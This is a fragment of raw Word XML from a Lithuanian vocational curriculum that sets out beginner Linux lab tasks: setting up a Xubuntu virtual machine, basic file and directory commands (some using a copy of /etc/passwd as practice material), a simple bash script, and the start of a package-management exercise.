          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Veiksmų eiga (žingsniai), kaip bus siekiama rezultato: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Darbas vykdomas Windows OS aplinkoje. Konfigūruojame VirtualBox įrankį pagal pateiktus parametrus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="004A061F">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Virtualios mašinos pavadinimas: VardasPavarde</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004A061F">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.Virtualios mašinos tipas: Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="004A061F">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Virtualios mašinos versija: Ubuntu (64 bit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="004A061F">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Virtualios mašinos RAM dydis: 2GB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="004A061F">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Virtualios mašinos HDD dydis: 10GB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="397" w:right="282"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="004A061F">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtualios mašinos tinklo konfigūracija: Bridged Adapter </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Diegiame GNU/Linux OS (Xubuntu) su pateiktais parametrais:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. Vartotojo vardas: VardasPavarde</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. Vartotojo slaptažodis: studentas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3. Serverio vardas studentas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Konfigūruojame GNU/Linux OS (Xubuntu) su pateiktais reikalavimais:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00761BAA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00F55F68" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Virtualioje sistemoje turi būti įdiegtas VirtualBox Guest Additions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. Virtualioje OS turi būti aktyvuota administratoriaus paskyra (root).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68"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xml:space="preserve"> XUBUNTU OS KONFIGŪRAVIMAS</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Xubuntu grafinius konfigūracijos įrankius sukonfigūruoti klaviatūros išdėstymą ir Xubuntu grafinės aplinkos išvaizdą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojamos priemonės (aplinkos): Xubuntu OS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Veiksmų eiga (žingsniai), kaip bus siekiama rezultato: naudojant Xubuntu Settings Manager konfigūruojame Keyboard ir Apperance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_Toc10443981"/>
      <w:bookmarkStart w:id="184" w:name="_Toc13095530"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="185" w:name="_Toc13833424"/>
      <w:bookmarkStart w:id="186" w:name="_Toc14392455"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Valdyti tarnybinę stotį naudojant jos komandinės eilutės sąsają ir jos pagrindines komandas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
      <w:bookmarkEnd w:id="184"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>
      <w:bookmarkEnd w:id="186"/>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DARBAS LINUX OS KOMANDŲ EILUTĖJE</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komandų eilutę atlikti failų ir katalogų kūrimo, kopijavimo, perkėlimo, pašalinimo veiksmus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojamos priemonės (aplinkos): Linux OS komandų eilutė.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Veiksmų eiga (žingsniai), kaip bus siekiama rezultato:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. Savo namų kataloge sukurkite katalogą Bandymas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. Kataloge Bandymas sukurkite failus: f1.txt, f2.txt, f3.txt, f4.txt, ff1.txt, ff2.txt, ff3.txt, ff4.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3. Pažiūrėkite katalogo Bandymas turinį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4. Savo namų kataloge sukurkite katalogą Tikslas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5. Nukopijuokite katalogo Bandymas failus f1.txt, f3.txt, ff2.txt, ff4.txt į katalogą Tikslas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6. Pažiūrėkite katalogo Tikslas turinį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7. Katalogo Tikslas failų vardus pakeiskite iš f*.txt į file*.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8. Perkėlkite pervadintus failus į katalogą Bandymas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9. Nukopijuokite failą passwd iš katalogo /etc į katalogą Bandymas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>10. Išveskite failo passwd turinį į ekraną.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>11. Suraskite faile passwd žodį root. Rezultatą išveskite į ekraną.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>12. Suskaičiuokite kiek yra simbolių faile passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>13. Išveskite į ekraną failo passwd 5 pirmas ir paskutines failo eilutes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>14. Kataloge Tikslas sukurkite failo passwd simbolinę nuorodą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>15. Pažiūrėkite katalogo Tikslas turinį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>16. Kataloge Bandymas ištrinkite failą passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>17. Pažiūrėkite katalogo Tikslas turinį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>18. Ištrinkite katalogą Bandymas su visu turiniu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68"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xml:space="preserve">  SUKURTI BASH SCENARIJŲ</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA: naudojant nano tekstinį redaktorių ir komandų eilutę parašyti paprastą scenarijų.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojamos priemonės (aplinkos): Linux OS komandų eilutė, nano tekstinis redaktorius.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Veiksmų eiga (žingsniai), kaip bus siekiama rezultato: sukurkite bash scenarijaus failą pavadinimu pavarde.sh. Parašykite scenarijų, kuris išveda į komandų eilutę Jūsų vardą, po to suskaičiuoja kiek Jūsų vardas turi simbolių. Papildomai scenarijus turi sukurti katalog</w:t>
      </w:r>
      <w:r w:rsidR="00672FBF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ą, kurio vardas bus Jūsų pavardė</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir nukopijuoti į šį katalogą failą passwd iš katalogo /etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="_Toc10443982"/>
      <w:bookmarkStart w:id="188" w:name="_Toc13095531"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="189" w:name="_Toc13833425"/>
      <w:bookmarkStart w:id="190" w:name="_Toc14392456"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Valdyti programinius paketus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
      <w:bookmarkEnd w:id="188"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
      <w:bookmarkEnd w:id="190"/>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LINUX OS PAKETŲ ADMINISTRAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>UŽDUOTIES SĄLYGA: naudojant komandų eilutę arba grafinius įrankius atnaujinti Linux OS ir įdiegti naujus programinius paketus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojamos priemonės (aplinkos): komandų eilutė, aptitude, Ubuntu software center.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Veiksmų eiga (žingsniai), kaip bus siekiama rezultato: </w:t>
      </w:r>
    </w:p>
